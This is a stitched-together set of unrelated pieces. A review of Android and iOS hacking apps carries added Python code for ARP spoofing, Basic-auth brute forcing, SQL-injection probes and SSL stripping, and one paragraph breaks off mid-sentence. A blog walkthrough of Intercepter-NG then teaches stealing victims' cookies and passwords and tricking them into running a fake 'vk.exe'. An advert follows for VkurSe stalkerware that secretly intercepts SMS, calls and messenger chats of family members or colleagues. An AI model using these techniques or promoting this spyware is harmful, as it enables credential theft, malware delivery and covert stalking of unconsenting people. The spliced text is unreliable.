“A smartphone with hacking tools? There is no such thing,” we would have told you until quite recently. The usual attack tools could only be run on something like Maemo. Now many tools have been ported to iOS and Android, and some hacking tools have been written specifically for the mobile environment. Can a smartphone replace a laptop in a penetration test? We decided to find out.

Android is a popular platform not only for mere mortals but also for people in the know. The number of useful utilities here is simply off the charts, and for that we can thank the UNIX roots of the system, which greatly simplified porting many tools to Android. Unfortunately, Google does not allow some of them into the Play Store, so you will have to install the corresponding APK manually. Some utilities also require full access to the system (anything that touches the iptables firewall, for example), so you should take care of root access in advance.

Each manufacturer does this differently, but the necessary instructions are easy enough to find. A good set of HOWTOs was put together by LifeHacker (bit.ly/eWgDlu). If your model is not there, the XDA-Developers forum (www.xda-developers.com) always comes to the rescue, with information on virtually any Android phone. One way or another, some of the utilities described below will work without root access. So, we present to you hacking utilities for Android.

Package Manager:


Let's start the review with an unusual package manager. The developers call it “utilities for superusers,” and that is not far from the truth. After installing BotBrew you get a repository from which you can download a huge number of familiar tools compiled for Android. Among them: Python and Ruby interpreters for running the numerous tools written in those languages, the tcpdump sniffer and the Nmap scanner for network analysis, Git and Subversion for working with version control systems, and much more.

Network scanners:


An inconspicuous smartphone, which, unlike a laptop, fits easily into a pocket and never raises suspicion, can be very useful for network reconnaissance. We have already mentioned how to install Nmap, but there is another option. PIPS is a port of the Nmap scanner specifically adapted for Android, albeit an unofficial one. With it you can quickly find active devices on the network, determine their OS with the fingerprinting options, perform a port scan; in short, do everything Nmap is capable of.

There are two problems with using Nmap, for all its power. First, the scan parameters are passed as command-line switches, which you must not only know but also type on an inconvenient mobile keyboard. Second, the scan results in the console output are not as clear as one would like. The Fing scanner has neither shortcoming: it scans the network very quickly, does fingerprinting, and then displays a clear list of all available devices, grouped by type (router, desktop, iPhone, and so on). For each host you can quickly view a list of open ports, and from there you can connect, say, to FTP using the FTP client installed on the system. Very convenient.


When it comes to analyzing a specific host, the NetAudit utility can be indispensable. It works on any Android device (even non-rooted) and allows you not only to quickly identify devices on the network, but also to examine them against a large fingerprinting database to identify the operating system and the CMS used on the web server. There are now more than 3,000 fingerprints in the database.



If, on the contrary, you need to work at a lower level and examine the network's operation in detail, you cannot do without Net Tools. It is a set of utilities indispensable in a system administrator's work that lets you fully diagnose the network the device is connected to. The package contains more than 15 different programs, such as ping, traceroute, arp, dns, netstat and route.

Wi-Fi monitor mode in Android:

Many Wi-Fi chipsets support a monitor mode that can be used for sniffing, capturing and cracking passwords. On Android devices, however, access to this mode is normally closed off by hardware limitations: most Android smartphones use the same Broadcom chips, bcm4329 or bcm4330, whose firmware does not expose it in the standard way.

The project website contains instructions for activating monitor mode on the Nexus One (Cyanogen 7) and the GS2 (Cyanogen 9), and ready-made packages can be downloaded.

To run it on other devices you need to download the source code and build the package yourself.

TRAFFIC MANIPULATIONS:


The tcpdump-based sniffer honestly logs all data into a pcap file, which can then be studied with familiar utilities such as Wireshark or NetworkMiner. Since it implements no MITM capabilities, it is rather a tool for analyzing your own traffic. For example, it is a great way to study what the programs installed on your device from dubious repositories send out.


If we talk about combat applications for Android, one of the most sensational is FaceNiff, which implements interception of, and injection into, intercepted web sessions. By downloading the APK package you can run this hacking tool on almost any Android smartphone and, by connecting to a wireless network, intercept accounts for a variety of services: Facebook, Twitter, VKontakte and so on, more than ten in total. Session hijacking is carried out with an ARP spoofing attack, but it is only possible on unprotected connections (FaceNiff cannot insert itself into SSL traffic). To curb the flood of script kiddies, the author limited the maximum number of sessions to three.

If the creator of FaceNiff wants money for its use, DroidSheep is a completely free tool with the same functionality. True, you won't find the package on the official website (Germany's harsh laws regarding security utilities are to blame), but it can be found on the Internet without any problems. The utility's main task is to intercept users' web sessions on popular social networks, again implemented with ARP spoofing. Secure connections remain a problem: like FaceNiff, DroidSheep flatly refuses to work with HTTPS.


This utility also demonstrates the insecurity of open wireless networks, but from a slightly different angle. It does not intercept user sessions; instead it routes HTTP traffic through itself by means of a spoofing attack and performs the manipulations you specify on it. These range from ordinary pranks (replacing all the pictures on a site with trollfaces, flipping all the images or, say, replacing Google results) to phishing attacks, where the user is served fake pages of popular services such as facebook.com, linkedin.com, vkontakte.ru and many others.
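The ARP spoofing behind FaceNiff, DroidSheep and the spoofer above is simple enough to show in full. The following is an added example, not code from the article or from any of the tools it reviews: it builds the raw Ethernet/ARP reply frames an attacker sends, and runs a small detector over a constructed sequence of frames that flags the moment an IP address changes its MAC. Every MAC and IP address in it is made up.

```python
"""ARP spoofing: an attacker answers ARP with its own MAC for the gateway's IP, so the
victim's traffic flows through the attacker's device. Builds the frames and detects them.

Added example; not code from the article or from any of the tools it reviews.
All MAC and IP addresses are constructed.
"""
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac: str) -> bytes:
    return bytes(int(x, 16) for x in mac.split(":"))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(x) for x in ip.split("."))


def arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying the ARP reply 'sender_ip is-at sender_mac'.
    Sent to the victim with the gateway's IP (and to the gateway with the victim's IP),
    this poisons both ARP caches and puts the attacker in the middle."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=Ethernet, ptype=IPv4, hlen=6, plen=4, opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame: bytes):
    """Return (opcode, sender_mac, sender_ip), or None if the frame is not ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    opcode = struct.unpack("!H", frame[20:22])[0]
    sender_mac = ":".join(f"{b:02x}" for b in frame[22:28])
    sender_ip = ".".join(str(b) for b in frame[28:32])
    return opcode, sender_mac, sender_ip


class ArpWatch:
    """Remember which MAC each IP answered with; report any IP that changes MAC.
    On a normal LAN an IP (the gateway's above all) almost never moves between MACs,
    so a change is a strong sign of poisoning."""

    def __init__(self):
        self.table = {}
        self.alerts = []

    def feed(self, frame: bytes):
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            return
        _, mac, ip = parsed
        known = self.table.get(ip)
        if known is not None and known != mac:
            self.alerts.append((ip, known, mac))
        self.table[ip] = mac


def demo():
    """Constructed scenario: the real gateway answers once, then an attacker claims its IP."""
    gateway_ip, victim_ip = "192.168.0.1", "192.168.0.20"
    real_gw, victim, attacker = "aa:bb:cc:00:00:01", "de:ad:be:ef:00:02", "de:ad:be:ef:00:66"
    watch = ArpWatch()
    watch.feed(arp_reply(real_gw, gateway_ip, victim, victim_ip))   # legitimate answer
    watch.feed(arp_reply(attacker, gateway_ip, victim, victim_ip))  # poisoned answer
    return watch.alerts


if __name__ == "__main__":
    for ip, old, new in demo():
        print(f"ARP change for {ip}: {old} -> {new}")
```

Putting such a frame on the wire means writing it to a raw AF_PACKET socket, which on Linux (and therefore Android) requires root; that is the real reason these tools need a rooted phone. On the defensive side, static ARP entries on the client, dynamic ARP inspection on managed switches, and above all end-to-end TLS are what make the attack useless, which is exactly why the tools above give up on HTTPS.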


If you ask which hacking utility for Android is the most powerful, Anti probably has no competitors. It is a real all-in-one hacking suite. The program's main task is to scan the network perimeter; then various modules enter the battle, implementing a whole arsenal: eavesdropping on traffic, carrying out MITM attacks, and exploiting the vulnerabilities found. There are disadvantages too. The first thing that catches the eye is that exploitation is carried out only from the program's central server on the Internet, so targets without an externally routable IP address are out of reach.

TRAFFIC TUNNELING:


Okay, but how do you protect your own data when it is transmitted over an open wireless network? Besides VPN, which Android supports out of the box, you can create an SSH tunnel. For this there is the excellent SSH Tunnel utility, which routes the traffic of selected applications, or of the entire system, through a remote SSH server.


It is often necessary to send traffic through a proxy or SOCKS server, and here ProxyDroid helps out. It is simple: you choose which applications' traffic to tunnel and specify the proxy (HTTP/HTTPS/SOCKS4/SOCKS5 are supported). If authentication is required, ProxyDroid supports that too. The configuration can also be bound to a specific wireless network, with different settings for each.

WIRELESS NETWORK:


The built-in wireless network manager is not very informative. If you need to quickly get a complete picture of nearby access points, the Wifi Analyzer utility is an excellent choice. It will not only show all nearby access points but also display the channel each operates on, its MAC address and, most importantly, the type of encryption used (seeing the coveted letters “WEP” means the “secure” network can be considered open, since WEP is broken). In addition, the utility is ideal for finding where a given access point is physically located, thanks to a visual signal strength indicator.


This utility, as its developer puts it, can be useful when a wireless network is filled to capacity with clients and that is exactly the moment you need a good, stable connection. WiFiKill lets you disconnect clients from the Internet either selectively or by a given criterion (for example, you can pick on all the Apple users). The program simply performs an ARP spoofing attack and redirects all the clients to itself; the blocking itself is implemented, rather crudely, with iptables. A control panel for fast-food Wi-Fi, in short.

WEB APPLICATION AUDIT:


Manipulating HTTP requests from a computer is a piece of cake; there are a huge number of utilities and browser plugins for it. On a smartphone things are a little more complicated. HTTP Query Builder lets you send a custom HTTP request with the parameters you need, for example a chosen cookie or a changed User-Agent. The result of the request is displayed in the standard browser.


If a site is protected with Basic Access Authentication, you can test its strength with the Router Brute Force ADS 2 utility. The utility was originally created to brute force passwords on router admin panels, but it can obviously be used against any other resource with similar protection. It works, but it is clearly crude: for example, there is no exhaustive brute force, only dictionary attacks.
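What these two tools do, sending a hand-built request with chosen headers and trying a wordlist against Basic auth, fits in a few dozen lines. The following is an added example, not code from the article, from Router Brute Force ADS 2 or from HTTP Query Builder: it starts a throwaway local "router admin page" that demands Basic auth and runs a dictionary attack against it, so it can be tried offline. The target credentials, realm and wordlist are all constructed.

```python
"""Dictionary attack on HTTP Basic Access Authentication, run against a throwaway
local server so it can be tried offline.

Added example; not code from the article, from Router Brute Force ADS 2 or from
HTTP Query Builder. The target credentials, realm and wordlist are constructed.
"""
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

VALID_USER, VALID_PASS = "admin", "letmein"  # the constructed 'router' credentials


class BasicAuthHandler(BaseHTTPRequestHandler):
    """Minimal router admin page: 401 + WWW-Authenticate until the right header arrives."""

    def do_GET(self):
        expected = "Basic " + base64.b64encode(f"{VALID_USER}:{VALID_PASS}".encode()).decode()
        if self.headers.get("Authorization") == expected:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"welcome")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="router"')
            self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server():
    server = HTTPServer(("127.0.0.1", 0), BasicAuthHandler)  # port 0: any free port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def try_login(host, port, user, password, path="/", user_agent="Mozilla/5.0"):
    """One hand-built request, as HTTP Query Builder would send it; returns the status.
    Basic auth is only base64(user:password) in a header, no encryption at all."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("GET", path, headers={"Authorization": "Basic " + token,
                                           "User-Agent": user_agent})
        return conn.getresponse().status
    finally:
        conn.close()


def dictionary_attack(host, port, user, wordlist):
    """Return the first password that is not answered with 401, or None."""
    for password in wordlist:
        if try_login(host, port, user, password) != 401:
            return password
    return None


def demo():
    """Run the attack against the embedded server with a constructed wordlist."""
    server = start_server()
    try:
        port = server.server_address[1]
        return dictionary_attack("127.0.0.1", port, "admin",
                                 ["password", "1234", "letmein", "admin"])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("found:", demo())
```

Two things worth noticing: the credential is sent as plain base64 on every request, so on an open network it is readable by any sniffer without any guessing at all; and the loop stops on the first non-401 answer, which is the right signal for Basic auth but would have to be a page-content check for a form-based login.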


Surely you have heard of Slowloris, the program for taking down web servers. It works by opening and holding the maximum number of connections to a remote web server, thereby preventing new clients from connecting. AnDOSid is an analogue of Slowloris right on your Android device. Sadly, two hundred connections are often enough to destabilize every fourth website running on Apache (mod_reqtimeout and the event MPM are the usual mitigation there).

VARIOUS USES:


When working with web applications and analyzing their logic, you very often encounter data transmitted in encoded form, namely Base64. Encode will help you decode this data and see exactly what is stored in it. Perhaps, by inserting quotes, encoding the result back into Base64 and substituting it into the URL of the site under test, you will get the coveted database query error.
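The decode, inject, re-encode, substitute cycle described above is easy to automate. The following is an added example, not code from the article or from Encode: it finds the query parameters of a URL that are valid Base64, appends a few injection payloads to the decoded value, re-encodes and rebuilds the URL. The URL and payloads are constructed.

```python
"""Turn a base64-encoded query parameter into SQL-injection probes: decode, append
a quote, re-encode, and rebuild the URL.

Added example; not code from the article or from Encode. The URL and payloads
are constructed.
"""
import base64
import binascii
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def decode_b64_param(value: str):
    """Decoded bytes if `value` is strict, padded base64 that round-trips, else None.
    The round-trip check rejects most plain words; short ones like 'abcd' still pass."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw if base64.b64encode(raw).decode() == value else None


def injected_variants(url: str, payloads=("'", '"', "' OR '1'='1")):
    """For each base64 parameter, one (name, decoded, mutated_url) per payload."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    variants = []
    for i, (name, value) in enumerate(params):
        decoded = decode_b64_param(value)
        if decoded is None:
            continue
        for payload in payloads:
            mutated = list(params)
            mutated[i] = (name, base64.b64encode(decoded + payload.encode()).decode())
            variants.append((name, decoded.decode("latin-1"),
                             urlunsplit(parts._replace(query=urlencode(mutated)))))
    return variants


if __name__ == "__main__":
    for name, decoded, probe in injected_variants("http://example.test/item?id=NDI%3D&page=2"):
        print(f"{name} ({decoded!r}) -> {probe}")
```

Request each variant and compare the answer with the unmodified one: a database error message is the obvious tell, but a changed response length or status is just as informative when errors are suppressed.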


If you need a hex editor, one is available for Android too. With HexEditor you can edit any file, including system files if you grant the program superuser rights. It is also an excellent replacement for the standard text editor, letting you easily find the desired piece of text and change it.

REMOTE ACCESS:


Once you have access to a remote host, you need to be able to use it, and for that we need clients. Let's start with SSH, where ConnectBot is already the de facto standard. Besides a convenient interface, it can set up secure tunnels over SSH connections.


A useful program for connecting to a remote desktop over RDP or VNC. It is very convenient that these are two clients in one; there is no need to use different tools for RDP and VNC.


A MIB browser written specifically for Android, with which you can manage network devices over SNMP. It can be useful for developing an attack vector against routers, because the default community string (in other words, the access password) for SNMP management has not gone anywhere.

IPHONE

The iOS platform is no less popular among security utility developers. But whereas on Android root was needed only for some applications, a jailbreak is almost always required on Apple devices. Fortunately, a jailbreak already exists even for the latest iDevice firmware (5.1.1). Together with full access you also get an alternative package manager, Cydia, which already contains many utilities.

WORKING WITH THE SYSTEM:


The first thing to do is install a terminal. For obvious reasons it is not included in the mobile OS, but we will need it to run the console utilities discussed below. The best terminal emulator is MobileTerminal: it supports several terminals at once, gesture control (for example, for sending ) and is generally well thought out.


Another, more involved way to get at the device's console is to install OpenSSH on it (via Cydia) and connect to it locally with an SSH client. With a good client such as iSSH, which has excellent touchscreen control, you can work with the local console and remote hosts from one place.

DATA INTERCEPTION:


Now that you have console access, you can try the utilities. Let's start with Pirni, the first full-fledged sniffer for iOS. The Wi-Fi module built into iDevices cannot be switched into the promiscuous mode needed for normal packet capture, so classic ARP spoofing is used for sniffing, routing all traffic through the device itself. The standard version is launched from the console, but there is a more advanced version, Pirni Pro, with a graphical interface. It can also parse HTTP traffic on the fly and automatically pull interesting data out of it (for example, logins and passwords) using regular expressions set in its settings.


The well-known sniffer Intercepter-NG recently gained a console version that works on iOS and Android. It grabs passwords sent over a variety of protocols, intercepts instant messenger messages, and reconstructs files from traffic. Network scanning and robust ARP poisoning are available too. To use it, first install the libpcap package via Cydia. The whole startup procedure boils down to setting the right permissions: chmod +x intercepter_ios. Run the sniffer without parameters and a clear interactive interface appears.

Hard to believe, but this sophisticated MITM tool has finally been ported to iOS. After a colossal amount of work, a full-fledged mobile port has been achieved. To spare yourself the dependency hell of compiling it yourself, install the ready-made package via Cydia after adding heworm.altervista.org/cydia as a source. The kit also includes the etterlog utility, which extracts various useful information (for example, FTP accounts) from the collected dump.

WIRELESS NETWORK ANALYSIS:

On old iOS versions enthusiasts ran aircrack and could break a WEP key, but we checked: the program does not work on new devices. So for studying Wi-Fi we have to be content with Wi-Fi scanners only. WiFi Analyzer analyzes and displays information about all available 802.11 networks around you, including SSIDs, channels, vendors, MAC addresses and encryption types. With such a program it is easy to find the physical location of an access point if you have forgotten it and, for example, read the WPS PIN printed on it that is required for connection.

NETWORK SCANNERS:


What program does every penetration tester, anywhere in the world, use regardless of goals and objectives? A network scanner. On iOS this will most likely be the powerful Scany toolkit. Thanks to a set of built-in utilities you can quickly get a detailed picture of the network devices and, for example, their open ports. The package also includes network testing utilities such as ping, traceroute and nslookup.


Many people, however, prefer Fing. The scanner has fairly simple and limited functionality, but it is quite enough for a first acquaintance with the network of, say, a cafeteria :). The results show the available services on remote machines and the MAC addresses and names of the hosts connected to the scanned network.


It would seem everyone has forgotten Nikto, but why? This web vulnerability scanner, written in a scripting language (Perl), can easily be installed via Cydia and launched from the terminal on a jailbroken device. Nikto will gladly provide additional information about the web resource under test, and you can add your own signatures to its database with your own hands.

REMOTE CONTROL:


Many network devices (including expensive routers) are managed over SNMP. This utility scans subnets for available SNMP services with a known community string (in other words, a default password). Note that searching for SNMP services with default community strings (public/private) in an attempt to gain management access is an integral part of any penetration test, alongside mapping the perimeter itself and identifying services.


Two utilities from the same vendor for connecting to a remote desktop over RDP and VNC. There are many similar utilities in the App Store, but these are especially convenient to use.

PASSWORD RECOVERY:

The legendary program that helps millions of hackers around the world “remember” their passwords has been ported to iOS. Now you can guess passwords for services such as HTTP, FTP, Telnet, SSH, SMB, VNC, SMTP, POP3 and many others right from your iPhone. For a more effective attack, though, stock up on good wordlists.

Everyone knows first-hand the danger of default passwords. PassMule is a kind of directory of default logins and passwords for network devices, conveniently organized by vendor, product and model, so finding the one you need is not difficult.

EXPLOITATION OF VULNERABILITIES:

METASPLOIT
www.metasploit.com


It is hard to imagine a more hacker-oriented utility than Metasploit, and it concludes our review today. Metasploit is a package of tools whose main task is exploiting vulnerabilities in software. Imagine: about 1000 reliable, proven exploits that a pentester needs every day, right on your smartphone! With such a tool you can really gain a foothold in any network. Metasploit lets you exploit not only holes in server applications; tools for attacking client applications are available too (for example, through the Browser Autopwn module, where a payload is injected into the client's traffic). There is no mobile version of the toolkit, but you can install the standard package on an Apple device using

Hello friends.

As promised, I continue with the Intercepter-NG program.

Today there will be a practical review.

Warning: do not change settings or press things mindlessly. At best it simply won't work or your Wi-Fi will turn off. I had a case where the router's settings were reset. So don't think all of this is harmless.

And even with the same settings as mine, it does not mean everything will work smoothly. In any case, for serious work you will have to study how all the protocols and modes operate.

Shall we get started?

Interception of cookies and passwords.

Let's start with the classic interception of passwords and cookies; the process is in principle the same as in the previous article, but I will go through it again with clarifications.

By the way, antivirus software often flags such tools and blocks data interception over Wi-Fi.

If the victim is on an Android or iOS device, you can only be content with what the victim enters in the browser (passwords, sites, cookies); if the victim uses a VK client app, problems arise: such apps simply stop working. The latest version of Intercepter-NG can solve this by replacing the victim's certificate. More on that later.

First, decide what you need to get from the victim. Maybe you need passwords for social networks, or just for websites. Maybe cookies are enough to log in as the victim and do something right away, or you need passwords to keep for later. Do you need to analyze the images and pages the victim viewed, or is that rubbish to you? Do you know whether the victim is already logged into the site (authorized on arrival) or will only now enter their credentials?

If you don't need pictures from visited resources, fragments of media files and some pages saved as HTML files, disable Settings - Resurrection. This slightly reduces the load on the router.

What can be enabled in Settings: if you are connected via an Ethernet cable, enable Spoof IP/MAC. Also enable Cookie killer (it resets cookies so that the victim is logged out of the site and has to log in again). Cookie killer relies on the SSL Strip attack, so don't forget to enable that as well.

It is also better to enable Promiscuous mode, which improves interception, but not all modules support it. Extreme mode can be left off: with it more ports are sometimes intercepted, but it also brings extra noise and load.

First select the interface through which you are connected to the Internet and the connection type: Wi-Fi, or Ethernet if connected to the router by cable.

In Scan Mode, right-click on the empty field and click Smart scan. All devices on the network will be scanned; all that remains is to add the desired victims with Add to NAT.

Alternatively, set any single IP, go to Settings - Expert mode and tick Auto ARP poison; in this case the program will add everyone who is connected to the network and anyone who connects later.

All that remains is to switch to NAT mode.

Click Configure MITMs; here we need SSL MITM and SSL Strip.

SSL MITM allows you to intercept data, although many browsers react to it by warning the victim.

SSL Strip downgrades the victim from the secure HTTPS protocol to HTTP; it is also required for Cookie killer to work.

We need nothing else: click Start ARP poison (the radiation icon) and wait for the victim's activity.

In Password mode, right-click and choose Show cookies. Then you can right-click a cookie and go to the full URL.

By the way, if the victim is on social networks, there is a chance their active conversations will appear in Messengers mode.

HTTP inject (slip a file to the victim).

Mmm, quite a tasty option.

You can make the victim download a file. We can only hope that the victim will run it. For plausibility, analyze which sites the victim visits and slip them something that looks like an update.

For example, if the victim uses VK, name the file vk.exe. Perhaps the victim will run it, deciding it is something useful.

Let's get started.


Bruteforce mode.

Brute force and password guessing mode.

One use is brute forcing the router admin panel; some other protocols are supported as well.

For brute forcing you need the following.

Enter the router IP as the Target server, select the telnet protocol, and enter the username, in our case admin.

At the bottom there is a button with a folder drawn on it; click it and open a password list (the folder with the program contains misc/pwlist.txt, a list of frequently used passwords, or you can use your own list).

After loading, press Start (the triangle) and go make some tea.

If there is a match (a password is found), the program stops.

You need to know the username; for a router, try the default, admin.

How to brute force.

Traffic changer (traffic substitution).

This function is more of a joke. You can make the victim land on a different site of your choosing when opening one site.

In Traffic mode, enter the string to look for on the left and the replacement on the right, with the same number of characters, otherwise it won't work.

Example: on the left we enter the string to be changed, on the right we change test1 to test2 (tick Disable HTTP gzip).

After entering, press ADD and then OK.
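Two of the modes above, SSL Strip and the Traffic changer, come down to rewriting an HTTP response before it reaches the victim, and the same-length and no-gzip rules are consequences of how that rewriting works. The following is an added example, not Intercepter-NG code: two functions over a constructed response that show the https-to-http downgrade (with the HSTS header removed and Content-Length corrected, which a real stripper has to do) and the literal same-length substitution. The response text and hostnames are made up.

```python
"""What SSL Strip and Traffic changer do to an HTTP response, reduced to two
pure functions over constructed response bytes.

Added example; this is not Intercepter-NG code. The response and hostnames are
constructed.
"""
import re

# https://host[:port] anywhere in headers (Location:) or body (links, forms, scripts)
HTTPS_URL = re.compile(rb"https://([A-Za-z0-9.-]+(?::\d+)?)", re.IGNORECASE)


def strip_https(response: bytes):
    """Downgrade every https:// reference to http:// and return (rewritten, hosts).
    The proxy keeps `hosts` so it can re-upgrade the victim's later plain-HTTP requests
    to HTTPS towards the real server."""
    head, sep, body = response.partition(b"\r\n\r\n")
    hosts = set()

    def downgrade(m):
        hosts.add(m.group(1).decode())
        return b"http://" + m.group(1)

    head = HTTPS_URL.sub(downgrade, head)  # redirects (Location: https://...)
    body = HTTPS_URL.sub(downgrade, body)
    lines = []
    for line in head.split(b"\r\n"):
        lower = line.lower()
        # HSTS would make the browser refuse the downgraded site next time; drop it.
        if lower.startswith(b"strict-transport-security:"):
            continue
        # Each rewrite shortens the body by one byte, so the length header must follow.
        if lower.startswith(b"content-length:"):
            line = b"Content-Length: %d" % len(body)
        lines.append(line)
    return b"\r\n".join(lines) + sep + body, hosts


def traffic_change(response: bytes, old: bytes, new: bytes) -> bytes:
    """Traffic changer: a literal, same-length substitution in the body.
    Same length because the tool patches packets in flight and leaves Content-Length
    and TCP sequence numbers untouched; gzip must be off or the text is not visible."""
    if len(old) != len(new):
        raise ValueError("old and new must have the same length")
    head, sep, body = response.partition(b"\r\n\r\n")
    if re.search(rb"(?im)^content-encoding:\s*(gzip|deflate|br)", head):
        raise ValueError("compressed body: disable HTTP gzip before substituting")
    return head + sep + body.replace(old, new)


# Constructed response, as a site might send it over plain HTTP.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Strict-Transport-Security: max-age=31536000\r\n"
    b"Content-Length: 51\r\n"
    b"\r\n"
    b'<a href="https://login.example.test/auth">test1</a>'
)

if __name__ == "__main__":
    stripped, hosts = strip_https(SAMPLE_RESPONSE)
    print(traffic_change(stripped, b"test1", b"test2").decode())
    print("downgraded:", hosts)
```

The limits of the trick are visible in the code: it only works if the victim's first request to the site is plain HTTP, a browser that already has the site in its HSTS list (or the preload list) never makes that request, and a mobile app that pins its certificate simply fails, which is exactly the "apps stop working" symptom described above.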

Finally, a video on how to intercept data from iOS clients, because, as you know, during a MITM attack their applications simply stop working.

I will soon make a video about what is written in the article.

That was data interception via Wi-Fi.

That's basically it. If you have anything to add, write; if something needs correcting, just write.

Until next time.

Interception programs for Android are a relatively new invention that is gaining popularity. Today, when technology, and the Internet in particular, has penetrated every area of our lives and having several personal pages on social networks has become the norm, it is not surprising that people want to stay informed about the lives of others, especially their colleagues, acquaintances, bosses, loved ones and family.

Interception on Android is attempted less often than other spying exercises for the simple reason that it is not so easy to listen in on someone else's device: the necessary technical equipment is available only to the special services. Today, however, some practitioners have gone further and offer the sophisticated public services for hacking accounts, online surveillance, and even real-world surveillance (detectives). But how effective is all this? You won't know until you see it for yourself.

Interception of messages: difficulties and reality

Message interception from Android is offered today by all and sundry, both individual practitioners and various services. There are many offers to intercept calls, hack social network pages and remotely hack devices, but each has its pitfalls: either the performer is unreliable (he may turn out to be a blackmailer), or he asks for money in advance (a pig in a poke), and besides, the result may not be worth the costs and effort you put in. Specialized services are another matter. Looking ahead, we will say that they cost money (not much), but they earn it. Not all services are equally functional and effective, though.

The difficulty of intercepting messages is that not every Android interception program is compatible with the device and has broad functionality. After all, communication is not limited to calls: people more often send SMS and instant messages, dozens a day. So you need a proper Android packet interception program that covers SMS, calls, messenger messages and, preferably, the web pages visited (intercepting HTTP requests on Android shows frequently visited resources, which helps parents monitor their children).

One more technical nuance: if a program claims to intercept all incoming and outgoing packets, it must be backed by a server-side service that processes the mass of messages, because a plain smartphone and its apps simply cannot cope.

VkurSe service

VkurSe is a service and a program of the same name for intercepting Android packets. Its functionality, the developers say, surpasses any other solution:

  • SMS interception on Android: incoming and outgoing messages, with all messages sent as an archive to e-mail;
  • VKontakte message interception on Android: you can read all messages from instant messengers, including Viber and WhatsApp;
  • interception of calls and SMS on Android: calls are recorded, archived and forwarded to you;
  • Wi-Fi control on Android: a keyword command disables Wi-Fi access on the monitored device;
  • positioning of the monitored device via GPS;
  • remote microphone recording on a keyword command;
  • changing the lock code via a message;
  • rebooting and switching the phone on and off;
  • a front-camera snapshot if the password is entered incorrectly;
  • clearing the phone memory via SMS;
  • archiving of all phone actions in your personal account on the website;
  • uploading all intercepted files to Google Drive.

This is only part of what the VkurSe service and program provide.

Interception Security

The biggest drawback of most phone interception programs is that they are easily detected. The program itself performs the interception, archiving and forwarding of the packets, which heavily loads the RAM of both the monitored device and the phone receiving the packages. The tapped phone starts to freeze constantly, switches on and reboots by itself, and consumes a lot of traffic, and its owner soon realizes that something is wrong, looks in the task manager or scans the phone from a PC, and finds the spy. VkurSe is different. For example, intercepting WhatsApp messages on Android requires sending a large package at once, and from one phone to another that takes time. Here VkurSe processes the request and sends only the actual information to your personal account on the website. The traffic interception is handled by the service as a whole, which greatly simplifies monitoring of correspondence and calls and, as a bonus, does not overload the phone. WhatsApp interception on Android completes in a matter of minutes, and you can read all the correspondence as a report in your e-mail or in your personal account.

As we said earlier, all interception and surveillance services operate strictly for a fee. But VkurSe made a small exception: in the download section of the site there are free versions for SMS interception on Android, so you can test the program and service for 7 days from registration and then decide whether to continue using it.

In conclusion, VkurSe is a working service and program for intercepting SMS on Android and more, which, by its own account, gives guaranteed results. There is the matter of a small user fee, but the truth is always worth every penny spent on it.

The Wireshark program is an excellent assistant for users who need to perform a detailed analysis of network packets, that is, of computer network traffic. The sniffer handles common protocols such as NetBIOS, FDDI, NNTP, ICQ, X.25, DNS, IRC, NFS, HTTP, TCP, IPv6 and many others. During analysis it splits a network packet into its components according to the relevant protocol and displays the decoded fields in readable form on the screen.

It supports a huge number of formats of transmitted and received information and can open capture files produced by other utilities. It works by switching the network card into promiscuous mode and capturing every packet that reaches it. It can also capture Wi-Fi packets, given an adapter and driver that support monitor mode.

How to use wireshark

The program studies the contents of information packets that pass through the network. To launch and use the results of the sniffer’s work, you do not need any specific knowledge, you just need to open it in the “Start” menu or click on the icon on the desktop (launching it is no different from any other Windows programs). A special function of the utility allows it to capture information packets, carefully decrypt their contents and return them to the user for analysis.

After launching Wireshark, you will see the program's main menu at the top of the window; it is used to control the utility. If you need to load files containing packets captured in previous sessions, or save the packets captured in the current session, use the "File" tab.

To start capturing network packets, click the "Capture" menu and then the "Interfaces" item, which opens a separate "Wireshark: Capture Interfaces" window listing all available network interfaces through which data packets can be captured. If the sniffer finds only one suitable interface, it will display all the important information about that interface.

The utility's results are direct evidence that, even when users are not transferring any data themselves at a given moment, the exchange of information on the network does not stop. After all, a local network stays in working order only because each of its elements (computers, switches and other devices) continuously exchanges service information with the others, and network tools of this kind are designed to intercept exactly such packets.

There is also a version for Linux systems.

It should be noted that the sniffer is extremely useful for network administrators and computer security services, because the utility allows you to identify potentially unprotected network nodes, the likely areas that can be attacked by hackers.

The same capability cuts both ways: beyond its direct purpose, Wireshark can be used to monitor and analyse network traffic in preparation for an attack on unprotected parts of the network, because intercepted traffic can be put to various uses.
